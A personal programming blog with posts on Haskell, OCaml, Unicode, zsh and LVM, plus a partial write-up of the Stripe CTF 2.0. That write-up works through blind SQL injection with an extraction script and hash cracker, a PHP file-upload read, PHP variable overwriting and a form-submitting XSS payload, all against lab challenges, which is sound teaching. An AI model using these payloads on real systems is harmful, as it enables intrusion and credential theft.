Enter the void *

Hello, world !

Etienne Millon — Fri, 11 Nov 2011 00:00:00 UT

blog :: IO ()
blog =
  putStrLn "Hello, world !"

This is my first attempt at blogging, I still don’t know what to expect. I will probably write about the following topics :

Programming, especially using functional languages.
Development of the Debian operating system.
Static analysis of software.
Computer security.

Like some of my friends, I decided to use a static blog generator. The first series of posts will be about setting this up with hakyll, git and S3. Stay tuned !

Hakyll 101

Etienne Millon — Mon, 21 Nov 2011 00:00:00 UT

So, the recent trend seems to be static blogging. Indeed, as a web application, a blog is mostly read-only. By generating static .html files, one can eliminate :

CPU load : static content is what’s easiest to serve, especially with modern servers using sendfile(2).
security issues : without dynamic page generation, the attack surface is also vastly reduced. Authentication is moved from a PHP or Python script to the Unix way.
deployment problems : I don’t know a free host that won’t serve static files. I use S3 (and the free tier will often be enough !) but if I am not satisfied, it’s dead simple to migrate.

Basically, it’s like moving from a dynamic language to a static one ☺. The only problem is if you want to add comments. The popular solution is Disqus but it is unfortunately a non-free application. I’ll probably stick to it but I fear data lock-in.

As it is fashionable, a lot of tools have appeared : pelican, blogofile, ikiwiki, jekyll… Being a haskeller, I decided to give hakyll a try.

Hakyll is a haskell library for writing and deploying static websites ; that’s about it. As in a dynamic application, you define routes and how to serve them :

makeCss :: Rules
makeCss =
  void $ match "css/*" $ do
      route   idRoute
      compile compressCssCompiler

Most rules consist of compiling markdown to HTML (with the fantastic pandoc library) and copying stuff around.

The resulting binary, when compiled, can be run to see previews, build files or even deploy the site.

 ~/www/blog [master] % ./blog
ABOUT

This is a Hakyll site generator program. You should always
run it from the project root directory.

USAGE

blog build           Generate the site
blog clean           Clean up and remove cache
blog help            Show this message
blog preview [port]  Run a server and autocompile
blog rebuild         Clean up and build again
blog server [port]   Run a local test server
blog deploy          Upload/deploy your site

So far I’ve found it very easy to use. That’s it for this first mini-tour. Stay tuned !

Unicode : Math, greek, symbols - you name it !

Etienne Millon — Mon, 28 Nov 2011 00:00:00 UT

EBCDIC, ASCII & the power of legacy

… and no, that’s not a movie title.

As you know, all your computer knows about is numbers, yet when you type on a keyboard, a character appears on your screen. This is thanks to character encodings.

There are several norms that defines how characters (ie, glyphs) are encoded into numbers. Besides dinosaurs such as EBCDIC, the “classic” way of encoding is ASCII – that is what most modern¹ operating systems use internally.

The problem with ASCII is that it maps every character to a single byte with MSB reset, meaning that you can have a maximum of 128 glyphs. It’s “good enough” for English (hey, the A stands for American) but terrible for international characters. This is even worse considering that 32 of them are control characters, ie mostly legacy. Did you ever need to interpret DC2, SI or GS in a program ?

The eighth bit being “reserved” can be used to support “extended characters”. Several vendors (including Microsoft) used the concept of “code pages” to use extra glyphs in the 128-255 range. For example, Latin-1 was used in western europe to display accentuated characters.

If all your data comes from one part of the world, it works fine, but with the following limitations if you need to handle international data :

it becomes necessary to have metadata specifying which codepage has to be used.
you have to choose exactly one codepage per document.

In other words, a more extensible system is needed. Hopefully, this system exists and is called…

Unicode

Unicode separates two notions :

what is a character. Unicode include a large collection of glyph names. For example, version 6.0 includes 109449 characters.
how a character is encoded as bytes. More precisely, this is the role of encodings such as UTF-8. Usually, they are compatible with ASCII (the byte representation coincides on characters 0-127).

What’s nice is that it’s easy to enter Unicode under X11. The last two sections explain how you can configure your system to type (for example) √, β and ✈ !

Configure a compose key

A “compose” key, or Multi_key under X11, will begin a character compose sequence. For example, when I type ~~, a square root (U+221A √) is entered.~~

To configure a compose key, you can use xmodmap(1). Put the following into ~/.Xmodmap to make your right control key act as a Multi_key :

keysym Control_R = Multi_key

Unfortunately, this file is not loaded automatically, so you have to run xmodmap ~/.Xmodmap when opening a X session (this can be done automatically if you put in in your ~/.xsession, for example).

Define a .XCompose mapping

The second part is to define mappings between key sequences and unicode codepoints. This is the role of the ~/.XCompose file.

As described in xcompose(5), a line looks like :

: "✈" U2708 # AIRPLANE

ie, a key sequence, a colon, a string and a character name. The comment does not hurt, as usual.

To start your own list of bindings, I suggest kragen’s repository, which includes an excellent set. And if you need to find a specific unicode character, the unicode script is very useful !

TL;DR: Spread the word, ♥ Unicode ☺

Yes, that excludes AS/400.↩︎

What's in an ADT ?

Etienne Millon — Wed, 14 Dec 2011 00:00:00 UT

Introduction

Algebraic Data Types, or ADTs for short, are a core feature of functional languages such as OCaml or Haskell. They are a handy model of closed disjoint unions and unfortunately, outside of the functional realm, they are only seldom used.

In this article, I will explain what ADTs are, how they are used in OCaml and what trimmed-down versions of them exist in other languages. I will use OCaml, but the big picture is about the same in Haskell.

Principles

Functional languages offer a myriad of types for the programmer.

some base types, such as int, char or bool.

functions, ie arrow types. A function with domain a and codomain b has type a -> b.

tuples, ie product types. A tuple is an heterogeneous, fixed-width container type (its set-theoretic counterpart is the cartesian product) For example, (2, true, 'x') has type int * bool * char. record types are a (mostly) syntactic extension to give name to their fields.

some parametric types. For example, if t is a type, t list is the type of homogeneous linked list of elements having type t.

what we are talking about today, algebraic types (or sum types, or variant types).

If product types represent the cartesian product, algebraic types represent the disjoint union. In another words, they are very adapted for a case analysis.

We will take the example of integer ranges. One can say that an integer range is either :

the empty range

of the form ]-∞;a]

of the form [a;+∞[

an interval of the form [a;b] (where a ≤ b)

the whole range (ie, ℤ)

With the following properties :

Disjunction : no range can be of two forms at a time.

Injectivity : if [a;b] = [c;d], then a = c and b = d (and similarly for other forms).

Exhaustiveness : it cannot be of another form.

Syntax & semantics

This can be encoded as an ADT :

type range = | Empty | HalfLeft of int | HalfRight of int | Range of int * int | FullRange

Empty, HalfLeft, HalfRight, Range and FullRange are t’s constructors. They are the only way to build a value of type t. For example, Empty, HalfLeft 3 and Range (2, 5) are all values of type t¹. They each have a specific arity (the number of arguments they take).

To deconstruct a value of type t, we have to use a powerful construct, pattern matching, which is about matching a value against a sequence of patterns (yes, that’s about it).

To illustrate this, we will write a function that computes the minimum value of such a range. Of course, this can be ±∞ too, so we have to define a type to represent the return value.

type ext_int = | MinusInfinity | Finite of int | PlusInfinity

In a math textbook, we would write the case analysis as :

min ∅ = +∞

min ]-∞;a] = -∞

min [a;+∞[ = a

min [a;b] = a

min ℤ = -∞

That translates to the following (executable !) OCaml code :

let range_min x = match x with | Empty -> PlusInfinity | HalfLeft a -> MinusInfinity | HalfRight a -> Finite a | Range (a, b) -> Finite a | FullRange -> MinusInfinity

In the pattern HalfLeft a, a is a variable name, so it get bounds to the argument’s value. In other words, match (HalfLeft 2) with HalfLeft x -> e bounds x to 2 in e.

It’s functions all the way down

Pattern matching seems magical at first, but it is only a syntactic trick. Indeed, the definition of the above type is equivalent to the following definition :

type range (* The following is not syntactically correct *) val Empty : range val HalfLeft : int -> range val HalfRight : int -> range val Range : int * int -> range val FullRange : range (* Moreover, we know that they are injective and mutually disjoint *) val deconstruct_range : (unit -> 'a) -> (int -> 'a) -> (int -> 'a) -> (int * int -> 'a) -> (unit -> 'a) -> range -> 'a

deconstruct_range is what replaces pattern matching. It also embodies the notion of exhaustiveness, because given any value of type range, we can build a deconstructed value out of it.

Its type looks scary at first, but if we look closer, its arguments are a sequence of case-specific deconstructors² and the value to get “matched” against.

To show the equivalence, we can implement deconstruct_range using pattern patching and range_min using deconstruct_range³ :

let deconstruct_range f_empty f_halfleft f_halfright f_range f_fullrange x = match x with | Empty -> f_empty () | HalfLeft a -> f_halfleft a | HalfRight a -> f_halfright a | Range (a, b) -> f_range (a, b) | FullRange -> f_fullrange ()

let range_min' x = deconstruct_range (fun () -> PlusInfinity) (fun a -> MinusInfinity) (fun a -> Finite a) (fun (a, b) -> Finite a) (fun () -> MinusInfinity) x

Implementation

After this trip in denotational-land, let’s get back to operational-land : how is this implemented ?

In OCaml, no type information exists at runtime. Everything exists with a uniform representation and is either an integer or a pointer to a block. Each block starts with a tag, a size and a number of fields.

With the Obj module (kids, don’t try this at home), it is possible to inspect blocks at runtime. Let’s write a dumper for range value and watch outputs :

(* Range of integers between a and b *) let rec rng a b = if a > b then [] else a :: rng (a+1) b let view_block o = if (Obj.is_block o) then begin let tag = Obj.tag o in let sz = Obj.size o in let f n = let f = Obj.field o n in assert (Obj.is_int f); Obj.obj f in tag :: List.map f (rng 0 (sz-1)) end else if Obj.is_int o then [Obj.obj o] else assert false let examples () = let p_list l = String.concat ";" (List.map string_of_int l) in let explore_range r = print_endline (p_list (view_block (Obj.repr r))) in List.iter explore_range [ Empty ; HalfLeft 8 ; HalfRight 13 ; Range (2, 5) ; FullRange ]

When we run examples (), it outputs :

0 0;8 1;13 2;2;5 1

We can see the following distinction :

0-ary constructors (Empty and FullRange) are encoded are simple integers.

other ones are encoded blocks with a constructor number as tag (0 for HalfLeft, 1 for HalfRight and 2 for Range) and their argument list afterwards.

Thanks to this uniform representation, pattern-matching is straightforward : the runtime system will only look at the tag number to decide which constructor has been used, and if there are arguments to be bound, they are just after in the same block.

Conclusion

Algebraic Data Types are a simple model of disjoint unions, for which case analyses are the most natural. In more mainstream languages, some alternatives exist but they are more limited to model the same problem.

For example, in object-oriented languages, the Visitor pattern is the natural way to do it. But class trees are inherently “open”, thus breaking the exhaustivity property.

The closest implementation is tagged unions in C, but they require to roll your own solution using enums, structs and unions. This also means that all your hand-allocated blocks will have the same size.

Oh, and I would love to know how this problem is solved with other paradigms !

Unfortunately, so is Range (10, 2). The invariant that a ≤ b has to be enforced by the programmer when using this constructor.↩︎

For 0-ary constructors, the type has to be unit -> 'a instead of 'a to allow side effects to happen during pattern matching.↩︎

More precisely, we would have to show that any function written with pattern matching can be adapted to use the deconstructor instead. I hope that this example is general enough to get the idea.↩︎

ZSH suffix aliases

Etienne Millon — Tue, 17 Jan 2012 00:00:00 UT

I recently changed my login shell to use zsh instead of the venerable bash. I am still wondering why I didn’t make the change earlier. Zsh’s infamous slowness almost not perceptible, at least with the default configuration.

One cool feature present in zsh is the notion of suffix alias (described in zshbuiltins(1)). Quick example :

$ alias -s pdf=evince $ filename.pdf

… will open filename.pdf under evince, as if evince filename.pdf had been typed. Handy !

But it is not restricted to files : the command is executed whenever the command line matches a suffix alias. So, for example you can define :

alias -s git='git clone'

… so that everytime you paste a URL ending in git, say git://git.debian.org/git/aptitude/aptitude.git, it will be git-cloned.

Stripe CTF 2.0 (partial) writeup

Etienne Millon — Thu, 30 Aug 2012 00:00:00 UT

The Stripe CTF 2.0 is over ! Massive props to Stripe for this great edition. I was stuck on level 5 but here is a humble writeup.

Level 0 : the Secret Safe

The first level is a web application written in node.js that holds a password in a SQLite database.

The error is in following line :

var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';

“LIKE” interprets its argument as a regular expression. The solution is thus to pass it a regular expression which matches everything : entering “%” reveals the password.

Level 1 : the Guessing Game

Here we have the following PHP script :

<html> <head> <title>Guessing Gametitle> head> <body> <h1>Welcome to the Guessing Game!h1> <p> Guess the secret combination below, and if you get it right, you'll get the password to the next level! $filename = 'secret-combination.txt'; extract($_GET); if (isset($attempt)) { $combination = trim(file_get_contents($filename)); if ($attempt === $combination) { echo "How did you know the secret combination was" . " $combination!? "; $next = file_get_contents('level02-password.txt'); echo "You've earned the password to the access Level 2:" . " $nextp>"; } else { echo "<p>Incorrect! The secret combination is not $attemptp>"; } } ?>
#" method="GET"> <p><input type="text" name="attempt">p> <p><input type="submit" value="Guess!">p> form> body> html>

The intent is that the script receives an “attempt” parameter, reads a file and compares the attempt with the file contents. But it uses a very insecure method of doing so : the function extract copies its associative array argument directly into the symbol table.

For example, the following script :

$vars = array('a' => 2, 'b' => 'foo'); extract($vars); echo "a = $a, b = $b\n"; ?>

outputs :

a = 2, b = foo

As the argument $_GET is controlled by the attacker, it means that we can overwrite any variable, including $filename. By providing the script the name of another file whose contents are known, we can bypass the check. There’s a very good candidate for such a file : index.php itself.

So, let’s url-encode the file (we also have to trim the last newline) and issue the following GET request with curl :

% curl localhost:8000/index.php \ -G \ -d filename=index.php \ -d attempt=$(perl -MURI::Escape \ -e '{local $/; $_=<>;} chomp; print uri_escape $_' \ !?
You've earned the password to the access Level 2: dummy-password [...]

Level 2 : the Social Network

Level 2 is a small script, also in PHP, where you can upload a picture and display it. But it’s also done in an insecure way :

the files are uploaded in a visible folder

any file extension is allowed

the server will execute everything with a .php extension

Have a small idea ? :) We can write a PHP script, upload it and execute from the upload directory. If it contains code to read the secret password, we’re done :

echo (file_get_contents("../password.txt")); ?>

Level 3 : the Secret Vault

The next level is a small application where you enter a login and a password, and if it matches one in the database, you have access to a secret. This time it is written in Python, using the Flask microframework. Better than PHP but it seems that the (fictional) developer has never heard about SQL injections !

The relevant lines are :

query = """SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1""".format(username) cursor.execute(query) res = cursor.fetchone() if not res: return "There's no such user {0}!\n".format(username) user_id, password_hash, salt = res calculated_hash = hashlib.sha256(password + salt) if calculated_hash.hexdigest() != password_hash: return "That's not the password for {0}!\n".format(username)

The query is vulnerable to SQL injections : if username contains a quote, it will close the other one. For example, if it is ' OR 1=1 --, the full query will be a valid one : SELECT id, password_hash, salt FROM users WHERE username = '' OR 1=1 --' LIMIT 1""".format(username).

% curl http://localhost:5000/login -d "username=' OR 1=1 --" -d password=foo That's not the password for ' OR 1=1 --!

Note that the error message is different when the query evaluates to something false :

% curl http://localhost:5000/login -d "username=' OR 1=2 --" -d password=foo There's no such user ' OR 1=2 --!

This means that we have a way to evaluate arbitrary (boolean) expressions. Using subqueries, we can get information from the database :

% curl http://localhost:5000/login \ -d "username=' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob') --"\ -d password=foo That's not the password for ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob') --! % curl http://localhost:5000/login \ -d "username=' OR 1=(SELECT COUNT(*) FROM users WHERE username='alice') --"\ -d password=foo There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='alice') --!

The DB contains a user named “bob” but no user named “alice”. What about his password hash?

% for p in $(seq 0 9) a b c d e f ; do curl http://localhost:5000/login \ -d "username=' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '$p%') --"\ -d password=foo done There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '0%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '1%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '2%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '3%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '4%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '5%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '6%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '7%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '8%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '9%') --! That's not the password for ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'a%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'b%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'c%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'd%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'e%') --! There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'f%') --!

So, the hash starts by a “a”. By scripting this, we can get bob’s password hash and salt (from generate_data.py we know that the salt and the password are made of 7 lowercase letters).

#!/usr/bin/env python import hashlib import itertools import requests import string def is_ok(query): full_query = "' OR 1=" + query + " --" payload = {'username': full_query, 'password' : 'foo' } url = "http://localhost:5000/login" r = requests.post(url, data=payload) return "not the password for" in r.text def next_char(user, field, chars, prefix): for c in chars: q = "(SELECT COUNT(*) FROM users "\ + "WHERE username = '{0}' "\ + "AND {1} LIKE '{2}{3}%')" if is_ok(q.format(user, field, prefix, c)): return c print prefix return None def crack(user, field, chars): prefix = '' while True: c = next_char(user, field, chars, prefix) if c is None: return prefix += c if __name__ == '__main__': crack('bob', 'password_hash', string.hexdigits) crack('bob', 'salt', string.ascii_lowercase)

And the output is something like :

% ./level3.py aee3d87d877c39d68e49c2c6e47789de3de40a73e2970fe2355011649932f5bb zxqtgxi

Gereating all strings and their hashes is a bit too slow in Python, so I put together a small C program to do the heavy work.

#include #include #include #include int main(int argc, char **argv) { char salt[] = "zxqtgxi"; unsigned char expected_hash[] = "\xae\xe3\xd8\x7d\x87\x7c\x39\xd6" "\x8e\x49\xc2\xc6\xe4\x77\x89\xde" "\x3d\xe4\x0a\x73\xe2\x97\x0f\xe2" "\x35\x50\x11\x64\x99\x32\xf5\xbb"; char s[15]; memcpy(&s[7], salt, 7); unsigned char hash[SHA256_DIGEST_LENGTH]; SHA256_CTX sha256; #define LOOP(n) for(s[n]='a';s[n]<='z';s[n]++) LOOP(0) LOOP(1) LOOP(2) LOOP(3) LOOP(4) LOOP(5) LOOP(6) { SHA256_Init(&sha256); SHA256_Update(&sha256, s, 14); SHA256_Final(hash, &sha256); if(!memcmp(hash, expected_hash, SHA256_DIGEST_LENGTH)) { printf("FOUND : %s\n", s); exit(0); } } return 0; }

A few minutes later, we have the answer.

Level 4 : the Karma Trader

New level, new language : Ruby this time. In the application written with the Sinatra framework, you can create accounts and transfer an amount of karma to another user, with the rule that once you transferred karma to a user, he can see your password. The goal is to get karma_fountain’s password, with the indication that he logs in often.

This is a good indication that it will be a XSS attack in karma_fountain’s browser : by injecting a piece of javascript into the page, we’ll fill and submit the transfer form. The obvious vector is the username ; alas it is filtered :

unless username =~ /^\w+$/ die("Invalid username. Usernames must match /^\w+$/", :register) end

But as the password is presented, it is also a possibility. It turns out that it is not filtered, and thus exploitable.

Let’s create a user “x” with the following password:

<script> var f = document.forms[0]; f['to'].value="x"; f['amount'].value="100"; f.submit(); script>

And to deliver this payload, we just have to send karma to karma_fountain. A minute later or so, its password appears.

Level 5 : the DomainAuthenticator

I couldn’t finish this level. This level is also a Sinatra web application, which can make POST requests to hosts ending in stripe-ctf.com. When the response contains “AUTHENTICATED”, you are marked as logged in as this host. The goal is to log in as a host name matching ^level05-\d+\.stripe-ctf\.com$. I tried two different techniques.

The first one is to have the level 5 host make a request to itself, so that this request triggers another request to an arbitrary controlled server (the server from level 2 can be used for this). The main problem is that the application needs 3 parameters : “username”, “password” and “pingback”, and it passes the only first two of them to the pingback URL. I tried header injection (injecting a &pingback=... at the end of the password), but it was filtered out.

The second one is to slightly abuse HTTP : a same host can have two hostnames and serve a different content depending on the “Host:” HTTP header. If the level 2 and level 5 run on the same IP, we could run a custom HTTP server on a high port, so that the POST would succeed (this would work because there is no check that the port is 80). Unfortunately, the two levels run on different hosts, so this does not work.

Other levels

A lot of complete solutions have been published since, for example this one. I’m quite frustrated because I’m almost sure that I tried adding a ?pingback parameter on level 5. Anyway, I hope that the next edition will be as interesting as this one, and that this time, I’ll win a t-shirt :)

Comonadic Life

Etienne Millon — Thu, 18 Oct 2012 00:00:00 UT

Of monads and comonads

This post is written in Literate Haskell. This means that you can copy it into a .lhs file¹ and run it through a Haskell compiler or interpreter.

Today we’ll talk about…

import Control.Comonad import Control.Monad

Comonads ! They are the categoric dual of monads, which means that the type signatures of comonadic functions look like monadic functions, but with the arrow reversed. I am not an expert in category theory, so I won’t go further.

I will use the following typeclass for comonads : it’s from Edward Kmett’s comonad package (split from the infamous category-extras package).

class Functor w => Comonad w where extract :: w a -> a extend :: (w a -> b) -> w a -> w b duplicate :: w a -> w (w a)

extend or duplicate are optional, as one can be written in terms of the other one. The Monad typeclass, for reference, can be described as² :

class Functor m => Monad m where return :: a -> m a (=<<) :: (a -> m b) -> m a -> m b join :: m (m a) -> m a

The duality is quite easy to see : extract is the dual of return, extend the one of (=<<) and duplicate the one of join.

So what are comonads good for ?

I stumbled upon an article which explains that they can be used for computations which depend on some local environment, like cellular automata. Comments ask whether it’s possible to generalize to higher dimensions, which I will do by implementing Conway’s Game of Life in a comonadic way.

List Zippers

List zippers are a fantastic data structure, allowing O(1) edits at a “cursor”. Moving the cursor element to element is O(1) too. This makes it a very nice data structure when your edits are local (say, in a text editor). You can learn more about zippers in general in this post from Edward Z Yang. The seminal paper is of course Huet’s article.

A list zipper is composed of a cursor and two lists.

data ListZipper a = LZ [a] a [a]

To go in a direction, you pick the head of a list, set it as your cursor, and push the cursor on top of the other list. We assume that we will only infinte lists, so this operation can not fail. This assumption is reasonnable especially in the context of cellular automata³.

listLeft :: ListZipper a -> ListZipper a listLeft (LZ (l:ls) x rs) = LZ ls l (x:rs) listLeft _ = error "listLeft" listRight :: ListZipper a -> ListZipper a listRight (LZ ls x (r:rs)) = LZ (x:ls) r rs listRight _ = error "listRight"

Reading and writing on a list zipper at the cursor is straightforward :

listRead :: ListZipper a -> a listRead (LZ _ x _) = x listWrite :: a -> ListZipper a -> ListZipper a listWrite x (LZ ls _ rs) = LZ ls x rs

We can also define a function to convert a list zipper to a list, for example for printing. As it’s infinite on both sizes, it’s not possible to convert it to the whole list, so we have to pass a size parameter.

toList :: ListZipper a -> Int -> [a] toList (LZ ls x rs) n = reverse (take n ls) ++ [x] ++ take n rs

We can easily define a Functor instance for ListZipper. To apply a function on whole zipper, we apply it to the cursor and map it on the two lists :

instance Functor ListZipper where fmap f (LZ ls x rs) = LZ (map f ls) (f x) (map f rs)

Time for the Comonad instance. The extract method returns an element from the structure : we can pick the one at the cursor.

duplicate is a bit harder to grasp. From a list zipper, we have to build a list zipper of list zippers. The signification behind this (confirmed by the comonad laws that every instance has to fulfill) is that moving inside the duplicated structure returns the original structure, altered by the same move : for example, listRead (listLeft (duplicate z)) == listLeft z.

This means that at the cursor of the duplicated structure, there is the original structure z. And the left list is composed of listLeft z, listLeft (listLeft z), listLeft (listLeft (listLeft z)), etc (same goes for the right list).

The following function applies repeatedly two movement functions on each side of the zipper (its type is more generic than needed for this specific case but we’ll instanciate z with something other than ListZipper in the next section).

genericMove :: (z a -> z a) -> (z a -> z a) -> z a -> ListZipper (z a) genericMove a b z = LZ (iterate' a z) z (iterate' b z) iterate' :: (a -> a) -> a -> [a] iterate' f = tail . iterate f

And finally we can implement the instance.

instance Comonad ListZipper where extract = listRead duplicate = genericMove listLeft listRight

Using this comonad instance we can already implement 1D cellular automata, as explained in the sigfpe article. Let’s see how they can be extended to 2D automata.

Plane zippers

Let’s generalize list zippers to plane zippers, which are cursors on a plane of cells. We will implement them using a list zipper of list zippers.

data Z a = Z (ListZipper (ListZipper a))

We start by defining move functions. As a convention, the external list will hold lines : to move up and down, we will really move left and right at the root level.

up :: Z a -> Z a up (Z z) = Z (listLeft z) down :: Z a -> Z a down (Z z) = Z (listRight z)

For left and right, it is necessary to alter every line, using the Functor instance.

left :: Z a -> Z a left (Z z) = Z (fmap listLeft z) right :: Z a -> Z a right (Z z) = Z (fmap listRight z)

Finally, editing is quite straightforward : reading is direct (first read the line, then the cursor) ; and in order to write, it is necessary to fetch the current line, write to it and write the new line.

zRead :: Z a -> a zRead (Z z) = listRead $ listRead z zWrite :: a -> Z a -> Z a zWrite x (Z z) = Z $ listWrite newLine z where newLine = listWrite x oldLine oldLine = listRead z

Time for algebra. Let’s define a Functor instance : applying a function everywhere can be achieved by applying it on every line.

instance Functor Z where fmap f (Z z) = Z (fmap (fmap f) z)

The idea behind the Comonad instance for Z is the same that the ListZipper one : moving “up” in the structure (really, “left” at the root level) returns the original structure moved in this direction.

We will reuse the genericMove defined earlier in order to build list zippers that describe movements in the two axes⁴.

horizontal :: Z a -> ListZipper (Z a) horizontal = genericMove left right vertical :: Z a -> ListZipper (Z a) vertical = genericMove up down

This is enough to define the instance.

instance Comonad Z where extract = zRead duplicate z = Z $ fmap horizontal $ vertical z

Conway’s (comonadic) Game of Life

Let’s define a neighbourhood function. Here, directions are moves on a plane zipper. Neighbours are : horizontal moves, vertical moves and their compositions (liftM2 (.))⁵.

neighbours :: [Z a -> Z a] neighbours = horiz ++ vert ++ liftM2 (.) horiz vert where horiz = [left, right] vert = [up, down] aliveNeighbours :: Z Bool -> Int aliveNeighbours z = card $ map (\ dir -> extract $ dir z) neighbours card :: [Bool] -> Int card = length . filter (==True)

The core rule of the game fits in the following function : if two neighbours are alive, return the previous state ; if three neighbours are alive, a new cell is born, and any other count causes the cell to die (of under-population or overcrowding).

It is remarkable that its type is the dual of that of a Kleisli arrow (a -> m b).

rule :: Z Bool -> Bool rule z = case aliveNeighbours z of 2 -> extract z 3 -> True _ -> False

And then the comonadic magic happens with the use of extend :

evolve :: Z Bool -> Z Bool evolve = extend rule

evolve is our main transition function between world states, and yet it’s only defined in terms of the local transition function !

Let’s define a small printer to see what’s going on.

dispLine :: ListZipper Bool -> String dispLine z = map dispC $ toList z 6 where dispC True = '*' dispC False = ' ' disp :: Z Bool -> String disp (Z z) = unlines $ map dispLine $ toList z 6

Here is the classic glider pattern to test. The definition has a lot of boilerplate because we did not bother to create a fromList function.

glider :: Z Bool glider = Z $ LZ (repeat fz) fz rs where rs = [ line [f, t, f] , line [f, f, t] , line [t, t, t] ] ++ repeat fz t = True f = False fl = repeat f fz = LZ fl f fl line l = LZ fl f (l ++ fl)

*Main> putStr $ disp glider * * *** *Main> putStr $ disp $ evolve glider * * ** *

We did it ! Implementing Conway’s Game of Life is usually full of ad-hoc boilerplate code : iterating loops, managing copies of cells, etc. Using the comonadic structure of cellular automata, the code can be a lot simpler.

In this example, ListZipper and Z should be library functions, so the actual implementation is only a dozen lines long!

The real benefit is that it has really helped be grasp the concept of comonads. I hope that I did not just fall into the comonad tutorial fallacy :)

Update (March 10th): Brian Cohen contributed a simple extension to simulate a closed topology. Thanks !

Or download the source on github.↩︎

In the real Haskell typeclass, there are the following differences: Monad and Functor are not related, join is a library function (you can’t use it to define an instance), (>>=) is used instead of its flipped counterpart (=<<) and there two more methods (>>) and fail.↩︎

Simulating a closed topology such as a torus may even be possible using cyclic lists instead of lazy infinite lists. Update: see Brian Cohen’s response at the end of this post.↩︎

At first I thought that it was possible to only use the Comonad instance of ListZipper to define horizontal and vertical, but I couldn’t come up with a solution. But in that case, the z generic parameter is instanciated to Z, not ListZipper. For that reason I believe that my initial thought can’t be implemented. Maybe it’s possible with a comonad transformer or something like that.↩︎

This could have been written in extension as there are only 8 cases, but it’s funnier and arguably less error prone this way :-)↩︎

Resizing a LVM partition

Etienne Millon — Tue, 13 May 2014 00:00:00 UT

I like to have /home on a separate partition. But sometimes it can backfire. If the root partition is full, you don’t have a lot of solutions. In particular, I found that debian-installer’s “automatic partitioning” sometimes creates very small root partitions. If you want to install big packages (ghc, eclipse, libreoffice, …), a 16GiB root partition is not enough.

In the past, filesystems were sitting on directly on top of partitions. It means that it was very difficult to change their size.

Modern systems (post-1998) can use LVM, which is a layer between filesystems and partitions. One of its advantages is that you can resize logical volumes (a LV is the virtual device node where the filesystem sits) after they have been created.

To resize the / and /home filesystems, it is necessary to change the change the size of both the filesystems and the LVs. But it is not possible to do it in any order: at any time, the filesystem must be smaller than its LV. So, the correct order of operations is:

shrink home filesystem

shrink home LV

expand root LV

expand root filesystem

Wait a second before you start reaching for your favorite live CD: all these operations can be done online. Actually, the two first ones need /home to be unmounted, so it has to be done in single user mode. Online expansion of the root file system is fairly new (it’s from Linux 3.3, 2012) but it works like a charm.

Manipulating partition and volume sizes are always a bit tricky. Sometimes you have to give sizes in blocks, sometimes in bytes. Sometimes it’s multiples of 1000 and sometimes it’s multiples of 1024. I would not feel comfortable after typing 4 commands with 4 sizes. Fortunately, LVM tools are wonderful and can “talk” to the underlying filesystem (using fsadm). And LVM knows how much space is free, so it can expand a partition to fill completely the disk (or more precisely the volume group).

In a nutshell, this complex operation can be done in two commands (in single user mode):

lvresize -r -L 800G /dev/mapper/machine-home lvresize -r -l '+100%FREE' /dev/mapper/machine-root

The -r switch enables fsadm. -L indicates the new size in terms of bytes, and -l in terms of LVM units (+100%FREE means: increase by the whole free space, ie fill the volume group).

That was almost too easy!

Making type inference explode

Etienne Millon — Wed, 21 May 2014 00:00:00 UT

Hindley-Milner type systems are in a sweet spot in that they are both expressive and easy to infer. For example, type inference can turn this program:

let rec length = function | [] -> 0 | x::xs -> 1 + length xs

into this one (the top-level type 'a list -> int is usually what is interesting but the compiler has to infer the type of every subexpression):

let rec length : 'a list -> int = function | [] -> (0 : int) | (x:'a)::(xs : 'a list) -> (1 : int) + ((length : 'a list -> int) (xs : 'a list) : int)

Because the compiler does so much work, it is reasonable to wonder whether it is efficient. The theoretical answer to this question is that type inference is EXP-complete, but given reasonable constraints on the program, it can be done in quasi-linear time (n log n where n is the size of the program).

Still, one may wonder what kind of pathological cases show this exponential effect. Here is one such example:

let p x y = fun z -> z x y ;; let r () = let x1 = fun x -> p x x in let x2 = fun z -> x1 (x1 z) in let x3 = fun z -> x2 (x2 z) in x3 (fun z -> z);;

The type signature of r is already daunting:

